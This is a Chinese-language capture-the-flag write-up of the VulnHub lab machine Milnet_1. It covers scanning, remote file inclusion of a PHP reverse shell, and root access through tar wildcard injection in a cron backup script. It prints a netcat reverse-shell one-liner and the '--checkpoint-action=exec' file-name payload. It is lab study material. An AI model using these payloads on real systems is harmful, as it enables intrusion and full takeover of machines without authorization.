Milnet_1 靶机

Milnet_1 靶机

信息收集

1
2
3
4
5
6
7
8
9
10
11
12
┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.1.1.136    
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-18 02:56 EDT
Nmap scan report for 192.1.1.136
Host is up (0.0017s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:73:48:B8 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 11.73 seconds

开放了 22,80 端口

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -sC -O -p22,80 192.1.1.136   
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-18 02:57 EDT
Nmap scan report for 192.1.1.136
Host is up (0.00044s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 9b:b5:21:38:96:7f:85:bd:1b:aa:9a:70:cf:db:cd:36 (RSA)
|   256 93:30:be:c2:af:dd:81:a8:25:2b:57:e5:01:49:91:57 (ECDSA)
|_  256 37:40:2b:cc:27:ae:89:22:d0:d2:65:65:c4:9b:53:42 (ED25519)
80/tcp open  http    lighttpd 1.4.35
|_http-title: Site doesn\'t have a title (text/html; charset=UTF-8).
|_http-server-header: lighttpd/1.4.35
MAC Address: 00:0C:29:73:48:B8 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.60 seconds

Ubuntu 操作系统,lighttpd 1.4.35 搭建

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=vuln -p22,80 192.1.1.136    
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-18 02:58 EDT
Nmap scan report for 192.1.1.136
Host is up (0.00033s latency).

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
|_http-dombased-xss: Couldn\'t find any DOM based XSS.
|_http-stored-xss: Couldn\'t find any stored XSS vulnerabilities.
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.1.1.136
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.1.1.136:80/nav.php
|     Form id: 
|     Form action: content.php
|     
|     Path: http://192.1.1.136:80/nav.php
|     Form id: 
|     Form action: content.php
|     
|     Path: http://192.1.1.136:80/nav.php
|     Form id: 
|_    Form action: content.php
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-enum: 
|_  /info.php: Possible information file
MAC Address: 00:0C:29:73:48:B8 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 87.41 seconds

枚举得到了 info.php,尝试目录爆破吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
┌──(kali㉿kali)-[~]
└─$ sudo feroxbuster -u http://192.1.1.136 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,rar,zip,gz,sql,jpg

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.10.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://192.1.1.136
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.10.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 💲  Extensions            │ [php, rar, zip, gz, sql, jpg]
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET       11l       28w      345c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET        8l       14w      145c http://192.1.1.136/index.php
200      GET        4l       11w      109c http://192.1.1.136/main.php
200      GET       14l       38w      532c http://192.1.1.136/nav.php
200      GET        8l       14w      145c http://192.1.1.136/
200      GET        5l       11w      110c http://192.1.1.136/content.php
200      GET      127l      336w    34456c http://192.1.1.136/mj.jpg
200      GET      700l     3645w    64174c http://192.1.1.136/info.php
200      GET      425l     1948w   128991c http://192.1.1.136/bomb.jpg
200      GET       28l      536w     3901c http://192.1.1.136/bomb.php
200      GET       12l       37w      253c http://192.1.1.136/props.php
403      GET       11l       26w      345c http://192.1.1.136/%7Echeckout%7E
[####################] - 87s  1543892/1543892 0s      found:11      errors:2      
[####################] - 87s  1543822/1543822 17765/s http://192.1.1.136/

查看 web 界面

首先看默认界面,这里的图片也存在隐写的可能,如果没有别的攻击路径,也不要漏过对图片隐写进行检查

左边的三个按钮是 nav.php,右边的图是 main.php,用 burp suite 抓包,分别点击三个按钮

nav.php 调用了 content.php,使用的是 POST 方法,不同按钮提交的 POST 内容不同。bomb 返回的是一连串的原子弹制作文字教程。这里发现 post 提交的内容加上 php 的后缀正好是目录扫描结果中存在的文件,说明可能存在文件包含漏洞

文件包含漏洞

尝试 ../../../../../../../etc/passwd 看看是否存在本地文件包含。返回结果为空,可能是默认加上了 .php 后缀。尝试远程文件包含。

1
2
3
4
5
6
7
┌──(kali㉿kali)-[~/Downloads/milnet/CVE-2018-15473]
└─$ vim php-reverse-shell.php

┌──(kali㉿kali)-[~/Downloads/milnet/CVE-2018-15473]
└─$ python -m http.server 8088                                                                           
Serving HTTP on 0.0.0.0 port 8088 (http://0.0.0.0:8088/) ...
192.1.1.136 - - [18/Jul/2023 04:37:07] "GET /php-reverse-shell.php HTTP/1.0" 200 -

反弹 shell 成功

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
┌──(kali㉿kali)-[~]
└─$ sudo nc -lvnp 1234                 
[sudo] password for kali: 
listening on [any] 1234 ...
connect to [192.1.1.128] from (UNKNOWN) [192.1.1.136] 53824
Linux seckenheim.net.mil 4.4.0-22-generic #40-Ubuntu SMP Thu May 12 22:03:46 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
 10:37:07 up 1 day,  5:04,  0 users,  load average: 0.00, 0.01, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can t access tty; job control turned off
$ python -c "import pty;pty.spawn('/bin/bash')"
/bin/sh: 1: python: not found
$ which python2
$ which python3
/usr/bin/python3
$ python3  -c "import pty;pty.spawn('/bin/bash')"
www-data@seckenheim:/$ whoami
whoami
www-data
www-data@seckenheim:/$ sudo -l
sudo -l
[sudo] password for www-data: 

Sorry, try again.
[sudo] password for www-data: 

Sorry, try again.
[sudo] password for www-data: 

sudo: 3 incorrect password attempts
www-data@seckenheim:/$ uname -a
uname -a
Linux seckenheim.net.mil 4.4.0-22-generic #40-Ubuntu SMP Thu May 12 22:03:46 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
www-data@seckenheim:/$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 1000
    link/ether 00:0c:29:73:48:b8 brd ff:ff:ff:ff:ff:ff
    inet 192.1.1.136/24 brd 192.1.1.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 fe80::20c:29ff:fe73:48b8/64 scope link 
       valid_lft forever preferred_lft forever
www-data@seckenheim:/$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

提权

查看网站目录下的文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
www-data@seckenheim:/var/www/html$ ls -laih
ls -laih
total 132K
661465 drwxr-xr-x 2 www-data www-data 4.0K Jul 18 08:36 .
661464 drwxr-xr-x 3 root     root     4.0K May 21  2016 ..
661702 -rw-r--r-- 1 root     root      72K Aug  6  2015 bomb.jpg
661721 -rw-r--r-- 1 root     root     3.9K May 21  2016 bomb.php
661718 -rw-r--r-- 1 root     root      124 May 21  2016 content.php
657852 -rw-r--r-- 1 root     root     3.3K Jul 18 08:36 index.lighttpd.html
661713 -rw-r--r-- 1 root     root      145 May 21  2016 index.php
661709 -rw-r--r-- 1 www-data www-data   20 May 21  2016 info.php
661717 -rw-r--r-- 1 root     root      109 May 21  2016 main.php
661427 -rw-r--r-- 1 root     root      18K Jan 22  2012 mj.jpg
655384 -rw-r--r-- 1 root     root      532 May 21  2016 nav.php
655381 -rw-r--r-- 1 root     root      253 May 22  2016 props.php

查看家目录文件

1
2
3
4
5
6
7
8
9
10
11
12
www-data@seckenheim:/home/langman$ ls -alih
ls -alih
total 40K
1051087 drwxr-xr-x 4 langman langman 4.0K May 21  2016 .
1048577 drwxr-xr-x 3 root    root    4.0K May 21  2016 ..
1048584 -rw------- 1 langman langman    6 May 22  2016 .bash_history
1051088 -rw-r--r-- 1 langman langman  220 May 21  2016 .bash_logout
1051090 -rw-r--r-- 1 langman langman 3.7K May 21  2016 .bashrc
1048581 drwx------ 2 langman langman 4.0K May 21  2016 .cache
1051089 -rw-r--r-- 1 langman langman  675 May 21  2016 .profile
1048596 -rw------- 1 langman langman 4.4K May 21  2016 .viminfo
1048591 drwxrwxr-x 2 langman langman 4.0K May 21  2016 SDINET
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
www-data@seckenheim:/home/langman$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
*/1 *   * * *   root    /backup/backup.sh
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

有定时任务 /backup/backup.sh

1
2
3
4
5
6
7
8
www-data@seckenheim:/$ ls -liah /backup/backup.sh
ls -liah /backup/backup.sh
655377 -rw-r--r-x 1 root root 57 May 21  2016 /backup/backup.sh
www-data@seckenheim:/$ cat /backup/backup.sh
cat /backup/backup.sh
#!/bin/bash
cd /var/www/html
tar cf /backup/backup.tgz *

tar 通配符提权

tar 命令存在通配符,直接搜索 tar 通配符 提权,找到一篇博客:

利用通配符进行Linux本地提权 - FreeBuf网络安全行业门户

通配符注入的手法:

1
2
3
4
echo "mkfifo /tmp/lhennp; nc 192.168.1.102 8888 0</tmp/lhennp | /bin/sh >/tmp/lhennp 2>&1; rm /tmp/lhennp" > shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1
tar cf archive.tar *

提权成功

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
┌──(kali㉿kali)-[~/Downloads/milnet]
└─$ sudo nc -lvnp 8888                 
[sudo] password for kali: 
listening on [any] 8888 ...
connect to [192.1.1.128] from (UNKNOWN) [192.1.1.136] 48100
whoami
root
id
uid=0(root) gid=0(root) groups=0(root)
cd /root
ls
credits.txt
cat credit.txt
cat: credit.txt: No such file or directory
cat credits.txt
        ,----,                                                               
      ,/   .`|                                                               
    ,`   .'  :  ,---,                          ,---,.                        
  ;    ;     /,--.' |                        ,'  .' |                  ,---, 
.'___,/    ,' |  |  :                      ,---.'   |      ,---,     ,---.'| 
|    :     |  :  :  :                      |   |   .'  ,-+-. /  |    |   | : 
;    |.';  ;  :  |  |,--.   ,---.          :   :  |-, ,--.'|'   |    |   | | 
`----'  |  |  |  :  '   |  /     \         :   |  ;/||   |  ,\' |  ,--.__| | 
    '   :  ;  |  |   /' : /    /  |        |   :   .'|   | /  | | /   ,'   | 
    |   |  '  '  :  | | |.    ' / |        |   |  |-,|   | |  | |.   '  /  | 
    '   :  |  |  |  ' | :'   ;   /|        '   :  ;/||   | |  |/ '   ; |:  | 
    ;   |.'   |  :  :_:,''   |  / |        |   |    \|   | |--'  |   | '/  ' 
    '---'     |  | ,'    |   :    |        |   :   .'|   |/      |   :    :| 
              `--''       \   \  /         |   | ,'  '---'        \   \  /   
                           `----'          `----'                  `----\'    
                                                                             

This was milnet for #vulnhub by @teh_warriar
I hope you enjoyed this vm!

If you liked it drop me a line on twitter or in #vulnhub.

I hope you found the clue:
/home/langman/SDINET/DefenseCode_Unix_WildCards_Gone_Wild.txt
I was sitting on the idea for using this technique for a BOOT2ROOT VM prives for a long time...

This VM was inspired by The Cuckoo\'s Egg. 
If you have not read it give it a try:
http://www.amazon.com/Cuckoos-Egg-Tracking-Computer-Espionage/dp/1416507787/
uname -a
Linux seckenheim.net.mil 4.4.0-22-generic #40-Ubuntu SMP Thu May 12 22:03:46 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 1000
    link/ether 00:0c:29:73:48:b8 brd ff:ff:ff:ff:ff:ff
    inet 192.1.1.136/24 brd 192.1.1.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 fe80::20c:29ff:fe73:48b8/64 scope link 
       valid_lft forever preferred_lft forever
knowledge_database > vulnhub
Milnet_1 靶机
https://i3eg1nner.github.io/2023/07/b6c4e7bd4006.html
作者
I3eg1nner
发布于
2023年7月18日
许可协议